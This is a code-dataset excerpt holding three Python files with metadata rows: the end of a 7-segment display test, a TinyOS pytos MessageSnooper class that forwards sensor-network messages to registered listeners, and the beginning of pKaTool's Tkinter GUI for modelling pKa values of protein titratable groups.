print('digital', digital)
display.clear()
digits = [1, 2, 3, 4]
display.show(digits)
input('1234 - Working? (Press Key)')
print('Updating one digit at a time:')
display.clear()
display.set_digit(1, 3)
sleep(0.5)
display.set_digit(2, 2)
sleep(0.5)
display.set_digit(3, 1)
sleep(0.5)
display.set_digit(0, 4)
input('4321 - (Press Key)')
print('Add double point\n')
display.show_colon(True)
sleep(0.2)
print('Brightness Off')
display.set_brightness(0)
sleep(0.5)
print('Full Brightness')
display.set_brightness(1)
sleep(0.5)
print('30% Brightness')
display.set_brightness(0.3)
sleep(0.3)
input('Start the clock?')
display.start_clock(military_time=True)
input('Stop the clock?')
display.stop_clock()
|
mit
| -4,063,615,821,204,735,500
| 28.16309
| 98
| 0.547903
| false
| 3.347291
| false
| false
| false
|
fresskarma/tinyos-1.x
|
tools/python/pytos/util/MessageSnooper.py
|
1
|
4759
|
#!/usr/bin/python
#$Id: MessageSnooper.py,v 1.2 2005/10/27 02:23:37 kaminw Exp $
# "Copyright (c) 2000-2003 The Regents of the University of California.
# All rights reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose, without fee, and without written agreement
# is hereby granted, provided that the above copyright notice, the following
# two paragraphs and the author appear in all copies of this software.
#
# IN NO EVENT SHALL THE UNIVERSITY OF CALIFORNIA BE LIABLE TO ANY PARTY FOR
# DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT
# OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF THE UNIVERSITY
# OF CALIFORNIA HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# THE UNIVERSITY OF CALIFORNIA SPECIFICALLY DISCLAIMS ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS
# ON AN "AS IS" BASIS, AND THE UNIVERSITY OF CALIFORNIA HAS NO OBLIGATION TO
# PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS."
#
# @author Kamin Whitehouse
#
import sys
import pytos.Comm as Comm
import pytos.tools.Drain as Drain
import pytos.tools.Drip as Drip
import threading
def registerAllMsgs(msgs, msgQueue, connection) :
for msgName in msgs._msgNames :
msg = msgs[msgName]
connection.register( msg , msgQueue )
class MessageSnooper( object ) :
"""This module offers \"register\" and \"unregister\" functions that
take a messageHandler argument but no message type argument.
Instead, the messageHandler will receive ALL incoming messages. It
currently handles local receive, drain messages, rpc messages, and
ramSymbol messages. Any new routing protocols should be
incorporated into this module.
usage:
snooper = MessageSnooper(app)
snooper.start
snooper.stop
snooper.register(callbackFcn)
snooper.unregister(callbackFcn)
"""
def __init__( self , app="" ) :
self.app = app
self.listeners = []
msgQueue = Comm.MessageQueue(10)
#register the msgQueue for all message types with localComm
comm = Comm.getCommObject(self.app, self.app.motecom)
registerAllMsgs(self.app.msgs, msgQueue, comm)
#register the msgQueue for all message types with drain and unregister DrainMsg with localComm
if "AM_DRAINMSG" in self.app.enums._enums :
drains = Drain.getDrainObject(self.app)
for drain in drains:
registerAllMsgs(self.app.msgs, msgQueue, drain)
comm.unregister(self.app.msgs.DrainMsg, msgQueue)
#if rpc is imported
if self.app.__dict__.has_key("rpc") :
#make sure a drip object exists for snooping on cmds
drips = Drip.getDripObject(self.app, self.app.motecom, self.app.enums.AM_RPCCOMMANDMSG)
#register the msgQueue for all rpc response messages
for command in self.app.rpc._messages.values() :
command.register(msgQueue)
#and unregister RpcResponseMsg from drain
drains = Drain.getDrainObject(self.app, self.app.motecom, 0xfffe) #ugh... hard coded number
for drain in drains:
drain.unregister(app.msgs.RpcResponseMsg, msgQueue)
#if ram symbols is imported
if self.app.__dict__.has_key("ramSymbols") :
#register the msgQueue for all ram symbol response messages
for symbol in self.app.ramSymbols._messages.values() :
symbol.registerPeek(msgQueue)
symbol.registerPoke(msgQueue)
#and unregister from peek/poke rpc commands
self.app.RamSymbolsM.peek.unregister(msgQueue)
self.app.RamSymbolsM.poke.unregister(msgQueue)
#register the msgQueue for all message types with drip and unregister DripMsg with localComm
if "AM_DRIPMSG" in self.app.enums._enums :
drips = Drip.getDripObject(self.app)
for drip in drips:
print "actually dtrying to register dripmsgs\n"
registerAllMsgs(self.app.msgs, msgQueue, drip)
comm.unregister(self.app.msgs.DripMsg, msgQueue)
self.running = True
msgThread = threading.Thread(target=self.processMessages,
args=(msgQueue,))
msgThread.setDaemon(True)
msgThread.start()
def processMessages(self, msgQueue) :
while True :
(addr,msg) = msgQueue.get()
if self.running == True :
for listener in self.listeners :
listener.messageReceived(addr, msg)
def stop(self) :
self.running = False
def start(self) :
self.running = True
def register(self, msgHandler) :
self.listeners.append(msgHandler)
def unregister(self, msgHandler) :
self.listeners.remove(msgHandler)
|
bsd-3-clause
| 8,937,040,000,648,870,000
| 37.691057
| 98
| 0.709603
| false
| 3.616261
| false
| false
| false
|
dmnfarrell/peat
|
pKaTool/pKa_system.py
|
1
|
55804
|
#!/usr/bin/env python
# -*- coding: iso-8859-15 -*-
#
# pKaTool - analysis of systems of titratable groups
# Copyright (C) 2010 Jens Erik Nielsen
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact information:
# Email: Jens.Nielsen_at_gmail.com
# Normal mail:
# Jens Nielsen
# SBBS, Conway Institute
# University College Dublin
# Dublin 4, Ireland
import sys
from Tkinter import *
import tkFileDialog
import pKa_base, pKa_system_help, pKa_calc, pKa_system_micro, pKa_system_file_menu, CCPS_stab_opt
import pKa_system_data_manipulation
import group_control
import ftir_data
__pKaSystemVersion__=1.2
#
# Geometry helper functions
#
def get_y_fromstab(val,span):
"""Get the y coordinate for plotting the stability curve"""
zero=10
graphrange=180
if span==0:
span=10
return (graphrange-val*(graphrange/span))+zero
#
# --------
#
class pKa_system(Frame,pKa_base.pKa_base,pKa_system_help.system_help,
pKa_system_help.pKsensitivity,
pKa_system_help.decompose,
pKa_system_micro.Micro_states,
pKa_system_file_menu.file_menu,
pKa_system_file_menu.fit_menu,
pKa_system_data_manipulation.data_manipulation,
CCPS_stab_opt.Optimisation_Analysis):
def __init__(self,numgroups=None,parent_application=None,data=None,protein=None,field_name=None,update=True):
#
# Set up the main window
#
# The main window provides choice between the different modes
# for now: pKa Calculations, pKa System
#
self.ID='pKa_system'
self.font="Times 12 bold"
self.fg_colour='white'
self.bg_colour='black'
self.colour_order=['#646464','#4444ff','red','green','magenta','yellow','orange','grey','magenta']
self.linewidth=2
self.names={}
self.lastdir=None
self.parent_application=parent_application
self.init_not_done=1
self.ID='pKa_system'
self.protein=protein
self.field_name=field_name
#
# Stability window parameters
#
self.stab_window=None
self.U_control=None
self.old_stab_status=''
self.exp_stab_curve=False
#
# Set the pKa calculation parameters
#
self.pHstart=0.00001
self.pHend=20.0
self.maxcrg=1.0
self.mincrg=-1.0
#
# pKa method
#
self.pkamethods={'Boltzmann':pKa_calc.Boltzmann,
'Monte Carlo':pKa_calc.Monte_Carlo,
'Tanford-Roxby':pKa_calc.Tanford_Roxby,
'Monte Carlo (C++)':pKa_calc.Monte_Carlo_CPP,
'Boltzmann (C++)':pKa_calc.Boltzmann_CPP}
#
# Check if we are called from EnzSim
#
self.enzsim=False
if protein=='__enzsim_application__':
self.enzsim=True
#
# Set data
#
self.data={'numgroups':numgroups}
#
# All lines drawn
#
self.lines={}
self.state_lines={}
self.stab_lines={}
self.to_clear=[]
self.stab_test_on=None
#
# Do the window
#
self.do_window()
if update:
self.update_pkasystem_curves()
self.window.update_idletasks()
#
# convert data
#
if data:
if data.has_key('groups'):
self.unpack_all_data(data)
else:
self.convert_titration_data(data)
return
#
# ------
#
def do_window(self):
#
# Main window
#
if not self.parent_application:
Frame.__init__(self)
self.window=self.master
else:
self.window=Toplevel()
#
# Title
#
#self.window.geometry('+280+380')
self.window.title("pKa System - Play with titratable groups")
#
# Get the size of the screen
#
#
# Text box til top
#
label1=Label(self.window, text="Enter number of titratable groups",font=self.font)
label1.grid(row=0,column=0, sticky=W)
#
# Entry field
#
self.number_of_groups=IntVar()
self.numgrps_widget=Entry(self.window,textvariable=self.number_of_groups)
#
# If we have a number then insert it
#
if self.data['numgroups']:
self.number_of_groups.set(self.data['numgroups'])
self.numgrps=self.data['numgroups']
self.window.destroy()
else:
def destroy(event=None):
self.numgrps=int(self.number_of_groups.get())
self.window.destroy()
return
self.number_of_groups.set(3)
self.numgrps_widget.grid(row=0,column=1,sticky=W)
self.numgrps_widget.bind('<Return>',destroy)
self.window.wait_window(self.window)
#
# Done
#
self.getgrps()
return
#
# --------------
#
def getgrps(self,event=None):
#
# Get the number of groups
#
import string
#
# Open the window for the titration curves
#
if not self.parent_application:
Frame.__init__(self)
self.window=self.master
screen_width=self.winfo_screenwidth()
screen_height=self.winfo_screenheight()
else:
self.window=Toplevel()
screen_width=self.parent_application.winfo_screenwidth()
screen_height=self.parent_application.winfo_screenheight()
#
self.titwin=self.window
self.titwin.title('Titration curves [native]')
#self.titwin.geometry('+20+%d' %(95+self.numgrps*43))
#
# Draw the window with the titration curves
#
self.titwidth=1200
self.titheight=450
self.tc=Canvas(self.titwin,bd=5,bg='white',width=self.titwidth,
height=self.titheight,
scrollregion=(0,0,self.titwidth,self.titheight))
self.tc.xview("moveto", 0)
self.tc.yview("moveto", 0)
self.tc.grid(row=0,column=0)
#
# Axes
#
self.draw_ordinates(self.tc)
#
# Open window with the controls
#
self.startrow=3
self.groups={}
self.win=Toplevel()
#
# Create the main pulldown menu
#
self.menu=Menu(self.win)
#
# File menu
#
self.file_menu=Menu(self.menu,tearoff=0)
self.file_menu.add_command(label='Load system',command=self.load_system)
self.file_menu.add_command(label='Save system',command=self.save_system)
if self.parent_application:
if getattr(self.parent_application,'ID',None):
if self.parent_application.ID=='EAT':
self.file_menu.add_command(label='Save system in EAT & Exit',command=self.send_system_to_EAT)
elif self.parent_application.ID=='Ekin':
self.file_menu.add_command(label='Save system in EAT',command=self.send_system_to_EAT)
self.file_menu.add_command(label='Load titration curves',command=self.load_curves)
self.file_menu.add_command(label='Save titration curves',command=self.save_curves)
self.file_menu.add_command(label='Load titration_DB data',command=self.load_titdb)
self.file_menu.add_command(label='Load pH activity profile',command=self.load_pH_activity_profile)
self.file_menu.add_command(label='Load pH stability profile',command=self.load_pH_stability_profile)
self.file_menu.add_command(label='Load FTIR data',command=self.load_FTIR_data)
self.file_menu.add_command(label='Print population table',command=self.print_table)
self.file_menu.add_command(label='Add group',command=self.add_group)
self.file_menu.add_command(label='Remove exp. titration curve',command=self.remove_exp_curve)
self.file_menu.add_command(label='Exit',command=self.quit_application)
self.menu.add_cascade(label='File',menu=self.file_menu)
#
# Command menu
#
self.command_menu=Menu(self.menu,tearoff=0)
self.command_menu.add_command(label='Decompose system',command=self.decompose_system)
self.command_menu.add_command(label='Sensitivity analysis',command=self.sensitivity_test)
self.command_menu.add_command(label='Change dielectric constant',command=self.change_dielectric)
self.command_menu.add_command(label='Activate updating',command=self.activate_callbacks)
self.command_menu.add_command(label='Deactivate updating',command=self.deactivate_callbacks)
self.command_menu.add_separator()
self.command_menu.add_command(label='Copy group to EAT_DB Ekin',command=self.copy_to_Ekin)
self.menu.add_cascade(label='Command',menu=self.command_menu)
#
# Fitting menu
#
self.fit_menu=Menu(self.menu,tearoff=0)
self.fit_menu.add_command(label='Fit system to loaded curves',command=self.fit_system_to_curves)
self.fit_menu.add_command(label='Fit to pH-activity profile',command=self.fit_to_ph_activity_profile)
self.fit_menu.add_command(label='Fit to loaded curves and pH-activity profile',command=self.fit_to_curves_and_ph_activity_profile)
self.fit_menu.add_command(label='Estimate experimental uncertainty',command=self.estimate_experimental_uncertainty)
self.fit_menu.add_separator()
self.fit_menu.add_command(label='Fit to FTIR data',command=self.fit_ftir)
self.fit_menu.add_command(label='Fit to FTIR data and pH-activity profile',command=self.fit_to_ftir_and_ph_activity_profile)
self.fit_menu.add_separator()
self.fit_menu.add_command(label='Combinatorial scan',command=self.combinatorial_scan)
self.fit_menu.add_command(label='Show close parameter sets',command=self.show_close)
self.fit_menu.add_command(label='Test uniqueness',command=self.test_uniqueness)
self.fit_menu.add_command(label='Uniqueness scan',command=self.uniqueness_scan)
self.fit_menu.add_separator()
self.fit_menu.add_command(label='Evaluate fit',command=self.evaluate_fit)
self.geom_var=StringVar()
self.fit_menu.add_command(label="Do geometry optimisation",command=self.start_geom)
self.fit_menu.add_command(label='Identify number of groups in system',command=self.identify_no_groups)
self.menu.add_cascade(label='NMR',menu=self.fit_menu)
#
# System analysis and optimisation
#
self.optana_menu=Menu(self.menu,tearoff=0)
self.optana_menu.add_command(label='CCPS population/Stability',command=self.stab_and_CCPS_pop)
self.menu.add_cascade(label='Optimise and Analyse',menu=self.optana_menu)
#
# View menu
#
self.view_menu=Menu(self.menu,tearoff=0)
# Show microscopic states
self.micro_var=IntVar()
self.micro_var.set(0)
self.view_menu.add_checkbutton(label='Microscopic titration',
command=self.update_pkasystem_curves,
variable=self.micro_var,onvalue=1,offvalue=0)
# Show loaded titration curves
self.display_loaded_curves=IntVar()
self.display_loaded_curves.set(0)
self.view_menu.add_checkbutton(label='Loaded titration curves',
command=self.update_pkasystem_curves,
variable=self.display_loaded_curves,onvalue=1,offvalue=0)
# Show ftir window
self.show_ftir=IntVar()
self.show_ftir.set(0)
self.view_menu.add_checkbutton(label='Show FTIR window',
command=self.update_pkasystem_curves,
variable=self.show_ftir,onvalue=1,offvalue=0)
#
# Window for manipulating kcat of microstates
#
self.kcat_window_visible=IntVar()
self.kcat_window_visible.set(0)
self.view_menu.add_checkbutton(label='kcat of microstates',
command=self.toggle_kcat_window,variable=self.kcat_window_visible,onvalue=1,offvalue=0)
self.menu.add_cascade(label='View',menu=self.view_menu)
#
# Help menu
#
self.help_menu=Menu(self.menu,tearoff=0)
self.help_menu.add_command(label='About pKaSystem',command=self.about)
self.menu.add_cascade(label='Help',menu=self.help_menu)
#
# Configure the menu
#
self.win.config(menu=self.menu)
#
self.win.title('Group controls')
#
# Place window close to center
#
self.win.geometry('+%d+%d' %(screen_width/2-min(600,screen_width/4),screen_height/2-min(500,screen_height/3)))
#
# Buttons for each group
#
int_ene=1
for id_num in range(self.numgrps):
#colour=self.colour_order[id_num%len(self.colour_order)]
int_ene=1
self.groups[id_num]=group_control.group_control(self,
self.startrow+id_num,
id_num,
self.numgrps,
int_ene,
self.colour_order)
#
# Button for controlling stability window
#
self.stability_var=StringVar()
self.stability_var.set('off')
self.stab_button=Checkbutton(self.win,text='Stability curve: ',
variable=self.stability_var,onvalue='on',
offvalue='off',
command=self.stability_on_off)
self.stab_button.deselect()
self.stab_button.grid(row=0,column=0,columnspan=2)
#
# Exit button
#
if self.enzsim:
self.exit_bt=Button(self.win,text='Data->EnzSim',command=self.quit_application)
else:
self.exit_bt=Button(self.win,text='Quit',command=self.quit_application)
self.exit_bt.grid(row=0,column=2,sticky='wens')
#
# Snapshot button
#
self.snapshot_btn=Button(self.win,text='Snapshot',command=self.snapshot)
self.snapshot_btn.grid(row=0,column=3,sticky='wens')
#
# Window capture button
#
self.print_btn=Button(self.win,text='Print2File',command=self.print2file)
self.print_btn.grid(row=0,column=4,sticky='wens')
#
# Clear button
#
self.clr_btn=Button(self.win,text='Clear all',command=self.clear)
self.clr_btn.grid(row=0,column=5,sticky='wens')
#
# pHstep slider
#
self.pHstep=DoubleVar()
self.pHstep_sl=Scale(self.win,from_=0.01,to=2.0,resolution=0.01,
orient='horizontal',relief='ridge',
command=self.update_pkasystem_curves,variable=self.pHstep,
label='pHstep')
self.pHstep_sl.grid(row=0,column=6,sticky='wens')
self.pHstep.set(0.5)
#
# pKa calculation method selector
#
self.pkamethod_sel=StringVar()
self.pkamethod_sel.set('Boltzmann')
self.pkamethod_button=Menubutton(self.win,textvariable=self.pkamethod_sel,relief=RAISED)
self.pkamethod_menu=Menu(self.pkamethod_button,tearoff=0)
self.pkamethod_button['menu']=self.pkamethod_menu
#
# Methods
#
for method in self.pkamethods.keys():
self.pkamethod_menu.add_radiobutton(label=method,
variable=self.pkamethod_sel,
value=method,
indicatoron=1,
command=self.update_pkasystem_curves)
self.pkamethod_button.grid(row=0,column=7,sticky='news')
#
# Monte Carlo steps
#
self.MCsteps=IntVar()
self.mcsteps_scale=Scale(self.win,from_=0,to=2500,resolution=100,
orient='horizontal',relief='ridge',
command=self.update_pkasystem_curves,
variable=self.MCsteps,
state=DISABLED,
label='Monte Carlo steps')
self.MCsteps.set(self.numgrps*100)
self.mcsteps_scale.grid(row=0,column=8,sticky='news')
#
# Button for updating the titration curves
#
stab_test=Button(self.win,text='Update curves',command=self.update_pkasystem_curves)
stab_test.grid(row=0,column=9,sticky='wens')
#
# Reposition the window with the titration curves according to the
# size of the control window
#
width,height,xorg,yorg=self.get_geometry(self.win)
self.titwin.geometry('+%d+%d' %(xorg-5,yorg+height+5))
#
# Draw the first curves
#
self.titwin.update()
self.win.update()
self.init_not_done=None
self.titwin.update()
self.win.update()
self.activate_callbacks()
#if self.master.update:
# self.update_pkasystem_curves()
#
# Done
#
return
#
# -----
#
def about(self):
"""Print the About section"""
import tkMessageBox
tkMessageBox.showinfo("pKaTool / pKaSystem",
'pKaTool version %s\nAuthors: Jens Erik Nielsen & Chresten S¯ndergaard\n\nCopyright (c) Jens Erik Nielsen\nUniversity College Dublin 2003-2007\nAll rigths reserved\nhttp://enzyme.ucd.ie/Science/pKa\n\nPlease remember to cite:\nAnalysing the pH-dependent properties of proteins using pKa calculations\nNielsen JE\nJ Mol Graph Model 2007 Jan;25(5):691-9\n\nIf using the NMR fitting routines please cite:\n\nDetermination of electrostatic interaction energies and protonation state populations in enzyme active sites\nS¯ndergaard CR, McIntosh LP, Pollastri G, Nielsen JE\nJ. Mol. Biol. (in press).' %__pKaSystemVersion__,parent=self.master)
return
#
# --------------------
#
def get_geometry(self,widget):
"""Get the geometry of a widget
Return width,height,xorg,yorg"""
widget.update_idletasks()
txt=widget.winfo_geometry()
width=int(txt.split('x')[0])
rest=txt.split('x')[1]
height=int(rest.split('+')[0])
xorg=int(rest.split('+')[1])
yorg=int(rest.split('+')[2])
return width,height,xorg,yorg
#
# -------
#
def quit_application(self):
"""Quit application"""
self.win.destroy()
self.titwin.destroy()
return
#
# --------------------
#
def snapshot(self):
#
# Preserve the current lines (for making figures)
#
x=0
for line in self.lines.keys():
x=x+1
if x==1:
self.tc.delete(line)
else:
self.to_clear.append(line)
del self.lines[line]
if x==2:
x=0
return
#
# --------------------
#
def print2file(self):
#
# Print Canvas to file
#
import sys, os
if not self.lastdir:
self.lastdir=os.getcwd()
filename=tkFileDialog.asksaveasfilename(defaultextension='.ps',
initialdir=self.lastdir,
filetypes=[("Postscript files","*.ps"),("All files","*.*")])
if filename:
self.write_psfile(filename)
else:
return
return
#
# --------------------
#
def write_psfile(self,filename):
"""
# Dump the Canvas to a postscript file
"""
import os
self.lastdir=os.path.split(filename)[0]
if filename[-3:]!='.ps':
filename=filename+'.ps'
self.tc.postscript(colormode='color',file=filename)
return
#
# --------------------
#
def clear(self,junk=None):
#
# Clear all lines
#
for line in self.to_clear:
self.tc.delete(line)
return
#
# --------------------
#
def stability_on_off(self):
"""Open a window for drawing the stability curve"""
#
# Should we open the stability window?
#
new=self.stability_var.get()
if new=='on' and self.old_stab_status!='on':
#
# Yes, open it
#
self.stab_test_on=1
self.old_stab_status='on'
self.stab_window=Toplevel()
#
self.stabwidth=1000
self.stabheight=300
self.stab_window.geometry('%dx%d+10+20' %(self.stabwidth,self.stabheight))
self.stab_window.title('pH dependence of protein stability')
self.stab_tc=Canvas(self.stab_window,bd=5,bg='white',width=self.titwidth,height=self.titheight,scrollregion=(0,0,self.titwidth,self.titheight))
self.stab_tc.xview("moveto", 0)
self.stab_tc.yview("moveto", 0)
self.stab_tc.grid(row=1,column=0)
#
# Plotting button
#
def print_curve(event=None):
Button(self.stab_window,command=print_curve).grid(row=0,column=0)
# pH axis
self.stab_startx=80
self.stab_endx=910
self.stab_starty=160
self.stab_endy=10
self.pH_axis(self.stab_tc,self.stab_startx,self.stab_starty,
self.stab_endx,self.stab_endy)
#
# Controls for unfolded pKa values
#
self.U_control=Toplevel()
self.U_control.title('Controls for Unfolded form')
self.U_control.geometry('+10+10')
self.unfolded_groups={}
for id_num in range(self.numgrps):
int_ene=1
#colour=self.colour_order[id_num%len(self.colour_order)]
self.unfolded_groups[id_num]=group_control.group_control(self,
self.startrow+id_num,id_num,
self.numgrps,int_ene,self.colour_order,window=self.U_control)
#
# If we are displaying real groups then set the intrinsic pKa to the model pKa value
#
if self.parent_application:
intpKa_folded=self.groups[id_num].modelpK
else:
intpKa_folded=self.groups[id_num].intpka.get()
#
self.unfolded_groups[id_num].intpka.set(intpKa_folded)
#
#
#
row=self.startrow+self.numgrps+1
self.show_grp_contribs=IntVar()
self.show_grp_contribs.set(0)
grp_contribs=Checkbutton(self.U_control,text='Show residue contributions',
onvalue=1,offvalue=0,variable=self.show_grp_contribs,command=self.update_pkasystem_curves)
grp_contribs.grid(row=row,column=0)
#
# Which contribution should we draw
#
self.contrib_type=IntVar()
self.contrib_type.set(1)
Radiobutton(self.U_control,text='contributions from pKa shifts',variable=self.contrib_type,value=1,command=self.update_pkasystem_curves).grid(row=row,column=1)
#Radiobutton(self.U_control,text='charge-charge contributions',variable=self.contrib_type,value=2,command=self.update_curves).grid(row=row,column=2)
#
# Should we show min and max stabilisation?
#
self.show_min_max_stab=IntVar()
self.show_min_max_stab.set(1)
Checkbutton(self.U_control,text='Show min and max stabilisation',
onvalue=1,
offvalue=0,
variable=self.show_min_max_stab,
command=self.update_pkasystem_curves).grid(row=row,column=3)
#
# Update curves
#
self.window.update()
self.U_control.update()
self.stab_test_on=None
self.update_pkasystem_curves()
#
# Move the windows to sensible positions
#
width,height,xorg,yorg=self.get_geometry(self.win)
self.U_control.geometry('+%d+%d' %(xorg,yorg+height))
#
width,height,xorg,yorg=self.get_geometry(self.U_control)
self.stab_window.geometry('+%d+%d' %(xorg,yorg+height))
#
# Activate the callbacks for the unfolded groups
#
self.activate_callbacks()
else:
self.old_stab_status='off'
self.stab_window.destroy()
self.U_control.destroy()
return
#
# --------------------
#
def dummy(self,event=None):
"""Dummy callback function"""
return
#
# ----
#
def setup_system(self,group_array,X,energies=None):
"""Set up the system of titratable groups from the info in group_array"""
import string
#
# Create the description of the system
#
self.names={}
self.ids={}
for group in group_array.keys():
name=':'+string.zfill(group,4)+':'
if group_array[group].acid_base.get()==1:
name=name+'ASP'
else:
name=name+'ARG'
self.names[group]=name
self.ids[name]=group
#
# Update experimtal data dictionary to new names...
#
if getattr(self,'titration_data',None):
for old_key in self.titration_data.keys():
for new_key in self.names:
if int(old_key[1:5]) == int(self.names[new_key][1:5]):
nk = old_key[0:6]+self.names[new_key][6:]
self.titration_data[self.names[new_key]]=self.titration_data[old_key]
if not old_key == self.names[new_key]:
del self.titration_data[old_key]
#
# Add all data
#
matrix={}
X.intene={}
X.intrinsic_pKa={}
for group in group_array.keys():
#
# Set everything
#
name1=self.names[group]
# Int pKa
intpka=group_array[group].intpka.get()
X.intrinsic_pKa[name1]=intpka
type=group_array[group].acid_base.get()
#
# Set the interaction energies
#
if not X.intene.has_key(group):
X.intene[name1]={}
matrix[name1]={}
for group2 in group_array[group].intenes.keys():
type2=group_array[group2].acid_base.get()
name2=self.names[group2]
if group_array[group].active.get()==1 and group_array[group2].active.get()==1:
if type==type2:
X.intene[name1][name2]=group_array[group].intenes[group2].get()
else:
X.intene[name1][name2]=-group_array[group].intenes[group2].get()
if name1!=name2:
matrix[name1][name2]=self.E2dist(X.intene[name1][name2],energies)
else:
X.intene[name1][name2]=0.0
#
# We only have part of the interaction energies in each group
# This is because the interaction energy is stored as a single
# Tk variable
#
for group2 in group_array.keys():
name2=self.names[group2]
type2=group_array[group2].acid_base.get()
if group2!=group:
if group_array[group2].intenes.has_key(group):
#
# Is this group active?
#
if group_array[group].active.get()==1 and group_array[group2].active.get()==1:
if type==type2:
X.intene[name1][name2]=group_array[group2].intenes[group].get()
else:
X.intene[name1][name2]=-group_array[group2].intenes[group].get()
#
# Matrix of distances
#
if name1!=name2:
matrix[name1][name2]=self.E2dist(X.intene[name1][name2],energies)
else:
X.intene[name1][name2]=0.0
#
else:
X.intene[name1][name2]=0.0
# Default distance for zero interaction energy
if name1!=name2:
matrix[name1][name2]=self.E2dist(0.0,energies)
#
# All Done
#
return matrix
#
# -----------------
#
def E2dist(self,E,energies=None):
"""
# convert an electrostatic interaction energy to a distance
# Units: E(kT), dist: A
If energies==1, then we do not convert the energy"""
#
# Check if we should return energies
#
import math
if energies:
return E
#
# No, return distances
#
E=abs(E) # the sign doesn't matter
if E>0.001:
#
# Look in Tynan-Connolly and Nielsen, Protein Science: Re-Designing protein pKa values
# for details on the formula below
#
eps=1.0 # We set eps to 1, and scale distances afterwards
distance=243.3*math.log(10.0)/(eps*E)
else:
distance=1000.0
return distance
#
# ------------------
#
def calc_pKas_from_scales(self,group_array):
"""Calculate pKa values for the system"""
#
# Fill instance with data
#
X=self.pkamethods[self.pkamethod_sel.get()]()
MCsteps=0
if self.pkamethod_sel.get()=='Monte Carlo':
MCsteps=self.MCsteps.get()
self.mcsteps_scale.configure(state=ACTIVE)
elif self.pkamethod_sel.get()=='Monte Carlo (C++)':
MCsteps=200000
else:
self.mcsteps_scale.configure(state=DISABLED)
#
matrix_dummy=self.setup_system(group_array,X)
#
# Set the pKa value variables
#
X.groups=X.intrinsic_pKa.keys()
X.groups.sort()
#
# Make a list of experimental pH values to include in calculation
#
exp_pHs =[]
if getattr(self,'titration_data',None):
for group in self.titration_data.keys():
for pH in self.titration_data[group].keys():
if exp_pHs.count(pH) == 0:
exp_pHs.append(pH)
#
# also include pH values from loaded ph-activity profile
#
if getattr(self,'activity_data',None):
for pH in self.activity_data.keys():
if exp_pHs.count(pH) == 0:
exp_pHs.append(pH)
#
# and also from ftir data
#
if getattr(self, 'FTIR_win',None):
for pH in self.FTIR_win.ftir_data.keys():
if exp_pHs.count(pH) ==0:
exp_pHs.append(pH)
#
# Include the effect of non-system groups?
#
if hasattr(self,'non_system_groups'):
if self.non_system_groups:
X.non_system_groups={}
for group_id in self.non_system_groups.keys():
name=self.names[group_id]
X.non_system_groups[name]=self.non_system_groups[group_id].copy()
#
# Get the pKa values
#
pKa_values,prot_states=X._calc_pKas(mcsteps=MCsteps,
phstep=self.pHstep.get(),
phstart=self.pHstart,
phend=self.pHend,
exp_pHs=exp_pHs,
verbose=1)
return X,pKa_values,prot_states
#
# -----------------
#
def update_scales(self,junk=None,draw=1,doit=None):
"""Update the scale widgets when the user moves a dial"""
#
# Folded (normal) groups
#
for group in self.groups.keys():
self.groups[group].update_scales()
#
# Update the unfolded scales if theyr're active
#
if self.stability_var.get()=='on':
for group in self.unfolded_groups.keys():
self.unfolded_groups[group].update_scales()
#
# Redraw everything
#
self.update_pkasystem_curves(junk,draw,doit)
return
#
# -----
#
def update_scales_from_fit(self,junk=None,draw=1,doit=None):
#
# update group scales from fitter
#
for group in self.groups:
self.groups[group].update_scales_from_fit()
self.update_pkasystem_curves(junk,draw,doit)
return
#
# -----
#
def update_pkasystem_curves(self,junk=None,draw=1,doit=None):
"""Update all curves"""
if self.init_not_done:
return
if self.stab_test_on and doit==None:
return
#
# Redraw the curves
#
import string, pKarun
PKana=pKarun.pKa_general.pKanalyse()
#
# Calculate pKa values for the folded form
#
X,pKa_values,prot_states=self.calc_pKas_from_scales(self.groups)
self.pKa_calc_instance=X
if not draw:
return X
#
# Set the pKa values
#
for group in pKa_values.keys():
self.groups[self.ids[group]].update_group_control()
self.groups[self.ids[group]].pkavalue.set("%4.1f" %pKa_values[group])
#
# Set the HH fit
#
solution,sq=PKana.fit_to_henderson(X.prot_states[group])
try:
self.groups[self.ids[group]].HHfit.set('%5.2f (%4.2f / %3.2f)' %(abs(float(solution[1])),abs(float(solution[0])),float(sq)))
except:
self.groups[self.ids[group]].HHfit.set('HH-fit error')
#
# Delete all lines from last round
#
for line in self.lines.keys():
self.tc.delete(line)
del self.lines[line]
# Draw the titration curves
self.titration_curves={}
groups=pKa_values.keys()
groups.sort()
group_count=0
colour_map = {}
for group in groups:
#
# Store everything in self.titration_curves
#
self.titration_curves[group]=X.prot_states[group].copy()
#
# Is this group active?
#
if self.groups[group_count].active.get()==0:
group_count=group_count+1
continue
#
# Yes
#
style=self.groups[group_count].style.get()
lastpH=X.pHvalues[0]
lastcrg=X.prot_states[group][lastpH]
colour=self.colour_order[group_count%len(self.colour_order)]
colour_map[group] = colour
#
for pH in X.pHvalues[1:]:
lastx,lasty=self.get_xy(lastpH,lastcrg)
crg=X.prot_states[group][pH]
x,y=self.get_xy(pH,crg)
if style==1:
self.lines[(self.tc.create_line(lastx,lasty,float(x),float(y),
fill=colour,
width=self.linewidth))]=1
else:
self.lines[(self.tc.create_line(lastx,lasty,float(x),float(y),
fill=colour,
width=self.linewidth,
dash=(1,2)))]=1
lastcrg=crg
lastpH=pH
#
# Update the counter for colours
#
group_count=group_count+1
#
# Should we draw the microscopic states?
#
if self.micro_var.get()==1:
self.update_microstates(X)
else:
self.close_state_win()
#
# Should we draw the stabilty curves?
#
stab_status=self.stability_var.get()
